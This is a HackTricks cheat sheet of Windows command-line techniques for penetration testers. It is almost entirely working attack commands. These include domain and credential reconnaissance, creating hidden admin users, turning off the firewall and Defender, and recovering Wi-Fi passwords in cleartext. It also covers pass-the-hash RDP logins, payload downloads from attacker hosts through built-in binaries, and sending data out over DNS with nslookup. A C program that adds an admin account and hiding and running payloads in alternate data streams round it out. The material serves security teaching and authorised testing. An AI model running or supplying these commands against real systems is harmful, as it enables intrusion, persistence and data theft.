HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
Basic CMD for Pentesters
Support HackTricks and get benefits!

System info

Version and Patches info

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
hostname
DRIVERQUERY #3rd party driver vulnerable?

Environment

set #List all environment variables
Some env variables to highlight:
  • COMPUTERNAME: Name of the computer
  • TEMP/TMP: Temp folder
  • USERNAME: Your username
  • HOMEPATH/USERPROFILE: Home directory
  • windir: C:\Windows
  • OS:Windos OS
  • LOGONSERVER: Name of domain controller
  • USERDNSDOMAIN: Domain name to use with DNS
  • USERDOMAIN: Name of the domain
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC

Mounted disks

(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername

AV

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
sc query windefend
#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Recycle Bin

dir C:\$Recycle.Bin /s /b

Processes, Services & Software

schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software

Domain info

echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
net groups /domain #List of domain groups
net group "domain computers" /domain #List of PCs connected to the domain
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
net group "Domain Controllers" /domain #List PC accounts of domains controllers
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
nltest /domain_trust #Mapping of the trust relationships.
gpresult /V # Get current policy applied

Logs & Events

#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321

Users & Groups

Users

whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
qwinsta #Anyone else logged in?
net user /add [username] [password] #Create user
โ€‹
#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
โ€‹
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe

Groups

#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators
โ€‹
#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group

List sessions

qwinsta
klist sessions

Password Policy

net accounts

Credentials

cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access

Persistence with users

# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
โ€‹
# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
โ€‹
# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

Network

Interfaces, Routes, Ports, Hosts and DNSCache

ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"

Firewall

netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
โ€‹
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off
โ€‹
::How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
โ€‹
::Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
โ€‹
::Enable Remote assistance:
reg add โ€œHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Serverโ€ /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
โ€‹
::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
โ€‹
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

Shares

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

Wifi

netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass

SNMP

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Network Interfaces

ipconfig /all

ARP table

arp -A

Download

Bitsadmin.exe
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
CertReq.exe
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Certutil.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
Desktopimgdownldr.exe
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Diantz.exe
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Esentutl.exe
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
Expand.exe
expand \\webdav\folder\file.bat c:\ADS\file.bat
Extrac32.exe
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Findstr.exe
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
Ftp.exe
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
GfxDownloadWrapper.exe
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Hh.exe
HH.exe http://some.url/script.ps1
Ieexec.exe
ieexec.exe http://x.x.x.x:8080/bypass.exe
Makecab.exe
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
MpCmdRun.exe
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
Replace.exe
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Excel.exe
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Powerpnt.exe
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Squirrel.exe
squirrel.exe --download [url to package]
Update.exe
Update.exe --download [url to package]
Winword.exe
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Wsl.exe
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Misc

cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type <file> #Cat file
โ€‹
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
โ€‹
#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden
โ€‹
#Give full control over a file that you owns
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision
โ€‹
#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
โ€‹
#exe2bat to transform exe file in bat file
โ€‹
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
โ€‹
# Get error messages from code
net helpmsg 32 #32 is the code in that case

Listen address ACLs

You can listen on http://+:80/Temporary_Listen_Addresses/ without being administrator.
netsh http show urlacl

Manual DNS shell

Attacker (Kali) must use one of these 2 options:
sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive

Victim

for /f tokens _**_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
You can also redirect the output, and then read it.
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>

Calling CMD from C code

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
โ€‹
// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
โ€‹
int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}

Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)

##Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
set-content - path {path to the file} - stream {name of the stream}
โ€‹
## Discover ADS contecnt
dir /R
streams.exe <c:\path\to\file> #Binary from sysinternals#
Get-Item -Path .\fie.txt -Stream *
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
โ€‹
##Extract content from ADS###
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
more < c:\ads\file.txt:test.exe
โ€‹
##Executing the ADS content###
โ€‹
* WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
โ€‹
* Rundll32
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
โ€‹
* Cscript
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
โ€‹
* Wscript
wscript c:\ads\file.txt:script.vbs
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
โ€‹
* Forfiles
forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
โ€‹
* Mavinject.exe
c:\windows\SysWOW64\notepad.exe
tasklist | findstr notepad
notepad.exe 4172 31C5CE94259D4006 2 18,476 K
type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
โ€‹
* MSHTA
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
(Does not work on Windows 10 1903 and newer)
โ€‹
* Control.exe
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
https://twitter.com/bohops/status/954466315913310209
โ€‹
* Create service and run
sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
sc start evilservice
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
โ€‹
* Powershell.exe
powershell -ep bypass - < c:\temp:ttt
โ€‹
* Powershell.exe
powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
โ€‹
* Powershell.exe
Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}
โ€‹
* Regedit.exe
regedit c:\ads\file.txt:regfile.reg
โ€‹
* Bitsadmin.exe
bitsadmin /create myfile
bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
bitsadmin /RESUME myfile
โ€‹
* AppVLP.exe
AppVLP.exe c:\windows\tracing\test.txt:ha.exe
โ€‹
* Cmd.exe
cmd.exe - < fakefile.doc:reg32.bat
https://twitter.com/yeyint_mth/status/1143824979139579904
โ€‹
* Ftp.exe
ftp -s:fakefile.txt:aaaa.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md
โ€‹
* ieframe.dll , shdocvw.dll (ads)
echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
https://github.com/sailay1996/misc-bin/blob/master/ads.md
โ€‹
* bash.exe
echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
bash.exe -c $(fakefile.txt:payload.sh)
https://github.com/sailay1996/misc-bin/blob/master/ads.md
โ€‹
* Regsvr32
type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
Support HackTricks and get benefits!
Copy link
On this page
System info
Version and Patches info
Environment
Mounted disks
AV
Recycle Bin
Processes, Services & Software
Domain info
Logs & Events
Users & Groups
Users
Groups
List sessions
Password Policy
Credentials
Persistence with users
Network
Interfaces, Routes, Ports, Hosts and DNSCache
Firewall
Shares
Wifi
SNMP
Network Interfaces
ARP table
Download
Misc
Listen address ACLs
Manual DNS shell
Calling CMD from C code
Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)